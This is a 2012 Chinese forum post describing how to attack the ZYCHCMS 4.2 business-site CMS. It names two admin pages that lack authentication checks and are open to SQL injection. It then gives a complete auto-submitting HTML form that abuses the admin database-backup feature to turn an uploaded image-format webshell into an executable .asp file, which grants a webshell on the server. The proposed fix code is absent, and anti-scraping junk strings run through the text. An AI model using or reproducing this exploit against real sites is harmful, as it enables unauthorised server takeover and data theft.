找回密码
 立即注册
查看: 2396|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
2 T. h$ L' h8 u( G; g

& k' f# L/ m, O) n/ W, a" i" A
! R, ?# j9 G& f- A$ O7 m* x, v/ }6 v  i/ m4 u5 i
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
% S7 s6 [4 P# d# D6 Z ①SQL注射漏洞
# Q! D  O- R* `) ^ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
" W1 f4 u) }9 r3 C: d5 [ 漏洞原因:未过滤
+ Y+ [! G* ~$ x7 U, t 漏洞代码:4 M9 j; _2 F+ Q0 k3 O
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。5 m2 t- e6 Y( L; s$ \- |/ F
修复方法:在文件开头加入代码* |& @7 K, l" V3 W

3 y4 t5 a6 o) ?1 l' K1 x2 _
" ]" Z& h& `1 f5 a% s, h; O②后台拿WBSHELL
- _  w5 \( T' Y 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
6 b6 L5 d( Y& S9 O" A# G 这里在网上找了一个,改了下,将就着用。
: Z. z* j& D8 W, N 以下是代码本地提交代码, n; L9 C& z! Q/ k+ ~6 M- g5 q

2 a: G- _. Z( a+ T/ x: `& l# Z
- V6 E% F0 w2 Z9 i<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>) j6 X( F# v4 D$ A# d. N
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>9 L2 s" I) v6 E2 |1 s
<tr>( H% \  b" B/ G" e# M
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; W& [  [& [! P9 l: m </tr>9 o" P7 O- O" H: k9 u9 r( g
<tr>
0 `$ ~: E3 W- X4 U: i <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
) Y, w) R2 _7 ^; B# g0 [ </span>
$ P, g( @3 @" E3 l" z# L0 P* M <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
* V$ q1 W; v$ Z( @ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ j& W! [: L4 c; b- n: x/ F6 l. a3 r <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>) W, M/ ^/ T, J5 x7 |$ G0 ?/ Q  f
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# {- W* F. o8 v% w# a2 Q# i
<div align=”left”>
* ~( n& F7 j& R4 `+ a0 p/ [ <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />4 ]" M* D/ r3 h7 w3 g6 {% s8 _
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>. u5 A1 I8 F; K- S  H
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />8 J" M# K& X5 o& @3 w
</div></td>
" c& U' x9 G( g9 ~( ` </tr>
( E0 c1 e; h( E7 k5 L <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>! Y0 c- O) z; Q: g( A% k7 W
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>5 G7 @9 K. N: ^
<td class=”td”><div align=”left”>% O: R  x' n6 |9 r  D4 E0 N
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
2 m% Q( n! O/ Z5 g! L# r2 |5 Y [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>" G" A6 K3 f  Z/ c4 x; B
</tr>) Y( J6 O$ r4 m9 u
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>( Q, ]7 ^" y% N$ W5 l. o  f) a  e
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>8 Z) o* ?5 v: h3 q) ~% p
<td class=”td”><div align=”left”>
! ~  _2 A% @9 Y' k <input type=”submit” value=”确定备份” class=”btn”+ l0 x/ g7 p, W8 G/ l! H0 T
</div></td>
2 C+ o" t3 l9 [" I2 K </tr>2 B. d: M8 `' k0 ?5 G* t
</table></td></tr></form>
4 p. R% t) n# ]; M/ a% @" w </table>
' F, b$ V8 d' d </td>) [/ M" |- H# t; o  t
</tr>) P4 m. s; Y$ D9 D8 R& @  ~
</table>0 u' c, D3 d+ x& w4 p
<script>
- y- l0 p* H2 v7 @ document.all.add.submit();7 ]+ ]; u8 k2 x# E, b. c/ u
</script>
. \5 [& q& m9 s$ \/ s  r/ f/ M
6 I" I0 _) r$ F- Q2 }0 [
! Z6 d# T% ~& O# U( r& B! h7 ?4 _) k5 K% M( X# \; B4 a, x
. m" ^$ ?# d& @( c1 {: g

1 b( e8 g& ]* v0 a, C# ~, b  [6 n0 G8 }7 q

" W* D! b9 |- C% ]3 [% ^/ M( t
5 g& e' L; Q" b% s9 K6 O7 L9 p: `  Q( d) K/ X6 n, @

6 [6 `1 n, G# l6 W. c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表